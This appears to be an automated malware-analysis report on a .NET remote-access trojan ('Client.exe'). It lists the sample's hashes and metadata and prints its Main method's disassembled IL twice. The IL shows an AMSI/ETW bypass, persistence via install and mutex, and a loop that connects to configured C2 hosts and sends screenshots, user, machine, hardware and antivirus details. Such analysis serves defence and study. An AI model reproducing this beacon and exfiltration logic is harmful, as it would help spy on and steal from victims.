Deep Malware Analysis of 7de7341601cfab62a5f49bf35f6034de | md5: 7de7341601cfab62a5f49bf35f6034de | Executable | PE (Portable Executable) | Win 32 Exe | x86 | .Net | SOS: 0.21

Summary by MalvaGPT

Characteristics

Hash	Hash Value
MD5	7de7341601cfab62a5f49bf35f6034de
Sha1	e4dd9c174d8e90a46c49ad4126592c87c9402d22
Sha256	2761fa2ef736c90e0ee550351db874e16a20bfd37ad7faa140e5a4254c20ea76
Sha384	c799e377b71d94dd7d8f0ecf0345175c7e6af831d7237f37cffd1ea85815e600d6af91dbe6635f1cd5582ba43a7a2294
Sha512	e16d672ef744eaf1ad38e378f6e819b504e595bac86356d8237ded7d3cb6678806b50a059677ed087d3aa0545c35b7c995e47e068cf4e7983f6406d4796d552b
SSDeep	3072:AG6+C8BzjyGtTDCXxqwVc2EbcVIFFK73ltOTnejwfoBWdW6w/QPeUwObodCyh:N6U11tTDCzc2AFhzGwfoBWdW6wADXb
TLSH	BA04E04C7B848DB9EF1F06B58A91A71A4731C3A35501C30AADCB46E1235EBD8CE468FD

PeID

.NET executable

Microsoft Visual C# / Basic .NET

Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL

Microsoft Visual C# v7.0 / Basic .NET

Microsoft Visual Studio .NET

File Structure

Informations

Name	Value
Module Name	Client.exe
Full Name	Client.exe
EntryPoint	System.Void Client.Program::Main(System.String[])
Scope Name	Client.exe
Scope Type	ModuleDef
Kind	Windows
Runtime Version	v4.0.30319
Tables Header Version	512
WinMD Version	<null>
Assembly Name	Client
Assembly Version	1.0.0.0
Assembly Culture	<null>
Has PublicKey	False
PublicKey Token	<null>
Target Framework	.NETFramework,Version=v4.0
Total Strings	286
Main Method	System.Void Client.Program::Main(System.String[])
Main IL Instruction Count	217
Main IL	call System.Void Client.Config::Init() call System.Void Client.Helper.AsmiAndETW::Bypass() ldsfld System.String Client.Config::Install ldstr AWE call System.String Client.Helper.EncryptString::Decode(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_0028: ldsfld System.String Client.Config::Mutex call System.Void Client.Helper.Install::Run() ldsfld System.String Client.Config::Mutex call System.Boolean Client.Helper.MutexControl::CreateMutex(System.String) brtrue IL_003C: call System.Void Client.Helper.Methods::MaxPriority() leave IL_032C: ret call System.Void Client.Helper.Methods::MaxPriority() call System.Void Client.Helper.Methods::PreventSleep() ldsfld Client.Helper.Client Client.Program::client ldfld System.Boolean Client.Helper.Client::itsConnect brtrue IL_0303: nop ldsfld System.String Client.Config::Hosts ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> nop <null> ldc.r8 88.5 ldc.r8 29.5 sub <null> call System.Int32 System.Convert::ToInt32(System.Double) stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc.0 <null> ldloc.0 <null> ldsfld System.Random Client.Helper.Methods::random ldloc.0 <null> ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> nop <null> ldc.r8 2 ldc.r8 29 mul <null> call System.Int32 System.Convert::ToInt32(System.Double) stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc.1 <null> ldloc.1 <null> ldc.i4.1 <null> ldelem System.String ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> nop <null> ldc.r8 22 ldc.r8 22 add <null> call System.Int32 System.Convert::ToInt32(System.Double) stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc.2 <null> ldsfld Client.Helper.Client Client.Program::client callvirt System.Void Client.Helper.Client::Disconnect() ldsfld Client.Helper.Client Client.Program::client ldloc.1 <null> ldc.i4.0 <null> ldelem System.String ldloc.2 <null> ldsfld System.Random Client.Helper.Methods::random ldloc.2 <null> ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String callvirt System.Void Client.Helper.Client::Connect(System.String,System.String) ldsfld Client.Helper.Client Client.Program::client ldfld System.Boolean Client.Helper.Client::itsConnect brfalse IL_0303: nop ldsfld Client.Helper.Client Client.Program::client ldsfld Client.Helper.Client Client.Program::client newobj System.Void Client.Helper.PingChecker::.ctor(Client.Helper.Client) stfld Client.Helper.PingChecker Client.Helper.Client::pingChecker ldsfld Client.Helper.Client Client.Program::client ldsfld Client.Helper.Client Client.Program::client newobj System.Void Client.Helper.LastPing::.ctor(Client.Helper.Client) stfld Client.Helper.LastPing Client.Helper.Client::lastPing ldsfld Client.Helper.Client Client.Program::client nop <null> ldc.r8 7 ldc.r8 7 add <null> call System.Int32 System.Convert::ToInt32(System.Double) newarr System.Object dup <null> ldc.i4.0 <null> ldstr ,qzzE{ call System.String Client.Helper.EncryptString::Decode(System.String) stelem.ref <null> dup <null> ldc.i4.1 <null> call System.Byte[] Client.Helper.Methods::CaptureResizeReduceQuality() stelem.ref <null> dup <null> nop <null> ldc.i4 1363145560 ldc.i4 1363145562 xor <null> conv.i4 <null> ldsfld System.String Client.Config::Group stelem.ref <null> dup <null> nop <null> ldc.r8 4.5 ldc.r8 1.5 sub <null> call System.Int32 System.Convert::ToInt32(System.Double) ldsfld System.String Client.Config::Hwid stelem.ref <null> dup <null> nop <null> ldc.r8 2 ldc.r8 2 add <null> call System.Int32 System.Convert::ToInt32(System.Double) call System.String System.Environment::get_UserName() ldstr gSg call System.String Client.Helper.EncryptString::Decode(System.String) call System.String System.Environment::get_MachineName() call System.String System.String::Concat(System.String,System.String,System.String) stelem.ref <null> dup <null> nop <null> ldc.r8 2.5 ldc.r8 2.5 add <null> call System.Int32 System.Convert::ToInt32(System.Double) ldsfld System.String Client.Config::Camera stelem.ref <null> dup <null> nop <null> ldc.r8 2 ldc.r8 3 mul <null> call System.Int32 System.Convert::ToInt32(System.Double) ldsfld System.String Client.Config::Cpu stelem.ref <null> dup <null> nop <null> ldc.r8 24.5 ldc.r8 3.5 div <null> call System.Int32 System.Convert::ToInt32(System.Double) ldsfld System.String Client.Config::Gpu stelem.ref <null> dup <null> nop <null> ldc.r8 12 ldc.r8 4 sub <null> call System.Int32 System.Convert::ToInt32(System.Double) ldsfld System.String Client.Config::WindowsVersion stelem.ref <null> dup <null> nop <null> ldc.r8 13.5 ldc.r8 4.5 sub <null> call System.Int32 System.Convert::ToInt32(System.Double) ldsfld System.String Client.Config::AntiVirus stelem.ref <null> dup <null> nop <null> ldc.r8 2 ldc.r8 5 mul <null> call System.Int32 System.Convert::ToInt32(System.Double) ldsfld System.String Client.Config::Version stelem.ref <null> dup <null> nop <null> ldc.r8 60.5 ldc.r8 5.5 div <null> call System.Int32 System.Convert::ToInt32(System.Double) ldsfld System.String Client.Config::DataInstall stelem.ref <null> dup <null> nop <null> ldc.i4 1743618521 ldc.i4 1743618517 xor <null> conv.i4 <null> ldsfld System.String Client.Config::Privilege stelem.ref <null> dup <null> nop <null> ldc.i4 24108876 ldc.i4 24108865 xor <null> conv.i4 <null> call System.String Client.Helper.Methods::GetActiveWindowTitle() stelem.ref <null> call System.Byte[] Leb128.LEB128::Write(System.Object[]) callvirt System.Void Client.Helper.Client::Send(System.Byte[]) nop <null> ldc.r8 100 ldc.r8 100 add <null> call System.Int32 System.Convert::ToInt32(System.Double) call System.Void System.Threading.Thread::Sleep(System.Int32) br IL_0046: ldsfld Client.Helper.Client Client.Program::client pop <null> leave IL_032C: ret ret <null>
Module Name	Client.exe
Full Name	Client.exe
EntryPoint	System.Void Client.Program::Main(System.String[])
Scope Name	Client.exe
Scope Type	ModuleDef
Kind	Windows
Runtime Version	v4.0.30319
Tables Header Version	512
WinMD Version	<null>
Assembly Name	Client
Assembly Version	1.0.0.0
Assembly Culture	<null>
Has PublicKey	False
PublicKey Token	<null>
Target Framework	.NETFramework,Version=v4.0
Total Strings	286
Main Method	System.Void Client.Program::Main(System.String[])
Main IL Instruction Count	217
Main IL	call System.Void Client.Config::Init() call System.Void Client.Helper.AsmiAndETW::Bypass() ldsfld System.String Client.Config::Install ldstr AWE call System.String Client.Helper.EncryptString::Decode(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_0028: ldsfld System.String Client.Config::Mutex call System.Void Client.Helper.Install::Run() ldsfld System.String Client.Config::Mutex call System.Boolean Client.Helper.MutexControl::CreateMutex(System.String) brtrue IL_003C: call System.Void Client.Helper.Methods::MaxPriority() leave IL_032C: ret call System.Void Client.Helper.Methods::MaxPriority() call System.Void Client.Helper.Methods::PreventSleep() ldsfld Client.Helper.Client Client.Program::client ldfld System.Boolean Client.Helper.Client::itsConnect brtrue IL_0303: nop ldsfld System.String Client.Config::Hosts ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> nop <null> ldc.r8 88.5 ldc.r8 29.5 sub <null> call System.Int32 System.Convert::ToInt32(System.Double) stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc.0 <null> ldloc.0 <null> ldsfld System.Random Client.Helper.Methods::random ldloc.0 <null> ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> nop <null> ldc.r8 2 ldc.r8 29 mul <null> call System.Int32 System.Convert::ToInt32(System.Double) stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc.1 <null> ldloc.1 <null> ldc.i4.1 <null> ldelem System.String ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> nop <null> ldc.r8 22 ldc.r8 22 add <null> call System.Int32 System.Convert::ToInt32(System.Double) stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc.2 <null> ldsfld Client.Helper.Client Client.Program::client callvirt System.Void Client.Helper.Client::Disconnect() ldsfld Client.Helper.Client Client.Program::client ldloc.1 <null> ldc.i4.0 <null> ldelem System.String ldloc.2 <null> ldsfld System.Random Client.Helper.Methods::random ldloc.2 <null> ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String callvirt System.Void Client.Helper.Client::Connect(System.String,System.String) ldsfld Client.Helper.Client Client.Program::client ldfld System.Boolean Client.Helper.Client::itsConnect brfalse IL_0303: nop ldsfld Client.Helper.Client Client.Program::client ldsfld Client.Helper.Client Client.Program::client newobj System.Void Client.Helper.PingChecker::.ctor(Client.Helper.Client) stfld Client.Helper.PingChecker Client.Helper.Client::pingChecker ldsfld Client.Helper.Client Client.Program::client ldsfld Client.Helper.Client Client.Program::client newobj System.Void Client.Helper.LastPing::.ctor(Client.Helper.Client) stfld Client.Helper.LastPing Client.Helper.Client::lastPing ldsfld Client.Helper.Client Client.Program::client nop <null> ldc.r8 7 ldc.r8 7 add <null> call System.Int32 System.Convert::ToInt32(System.Double) newarr System.Object dup <null> ldc.i4.0 <null> ldstr ,qzzE{ call System.String Client.Helper.EncryptString::Decode(System.String) stelem.ref <null> dup <null> ldc.i4.1 <null> call System.Byte[] Client.Helper.Methods::CaptureResizeReduceQuality() stelem.ref <null> dup <null> nop <null> ldc.i4 1363145560 ldc.i4 1363145562 xor <null> conv.i4 <null> ldsfld System.String Client.Config::Group stelem.ref <null> dup <null> nop <null> ldc.r8 4.5 ldc.r8 1.5 sub <null> call System.Int32 System.Convert::ToInt32(System.Double) ldsfld System.String Client.Config::Hwid stelem.ref <null> dup <null> nop <null> ldc.r8 2 ldc.r8 2 add <null> call System.Int32 System.Convert::ToInt32(System.Double) call System.String System.Environment::get_UserName() ldstr gSg call System.String Client.Helper.EncryptString::Decode(System.String) call System.String System.Environment::get_MachineName() call System.String System.String::Concat(System.String,System.String,System.String) stelem.ref <null> dup <null> nop <null> ldc.r8 2.5 ldc.r8 2.5 add <null> call System.Int32 System.Convert::ToInt32(System.Double) ldsfld System.String Client.Config::Camera stelem.ref <null> dup <null> nop <null> ldc.r8 2 ldc.r8 3 mul <null> call System.Int32 System.Convert::ToInt32(System.Double) ldsfld System.String Client.Config::Cpu stelem.ref <null> dup <null> nop <null> ldc.r8 24.5 ldc.r8 3.5 div <null> call System.Int32 System.Convert::ToInt32(System.Double) ldsfld System.String Client.Config::Gpu stelem.ref <null> dup <null> nop <null> ldc.r8 12 ldc.r8 4 sub <null> call System.Int32 System.Convert::ToInt32(System.Double) ldsfld System.String Client.Config::WindowsVersion stelem.ref <null> dup <null> nop <null> ldc.r8 13.5 ldc.r8 4.5 sub <null> call System.Int32 System.Convert::ToInt32(System.Double) ldsfld System.String Client.Config::AntiVirus stelem.ref <null> dup <null> nop <null> ldc.r8 2 ldc.r8 5 mul <null> call System.Int32 System.Convert::ToInt32(System.Double) ldsfld System.String Client.Config::Version stelem.ref <null> dup <null> nop <null> ldc.r8 60.5 ldc.r8 5.5 div <null> call System.Int32 System.Convert::ToInt32(System.Double) ldsfld System.String Client.Config::DataInstall stelem.ref <null> dup <null> nop <null> ldc.i4 1743618521 ldc.i4 1743618517 xor <null> conv.i4 <null> ldsfld System.String Client.Config::Privilege stelem.ref <null> dup <null> nop <null> ldc.i4 24108876 ldc.i4 24108865 xor <null> conv.i4 <null> call System.String Client.Helper.Methods::GetActiveWindowTitle() stelem.ref <null> call System.Byte[] Leb128.LEB128::Write(System.Object[]) callvirt System.Void Client.Helper.Client::Send(System.Byte[]) nop <null> ldc.r8 100 ldc.r8 100 add <null> call System.Int32 System.Convert::ToInt32(System.Double) call System.Void System.Threading.Thread::Sleep(System.Int32) br IL_0046: ldsfld Client.Helper.Client Client.Program::client pop <null> leave IL_032C: ret ret <null>

7de7341601cfab62a5f49bf35f6034de (188.93 KB)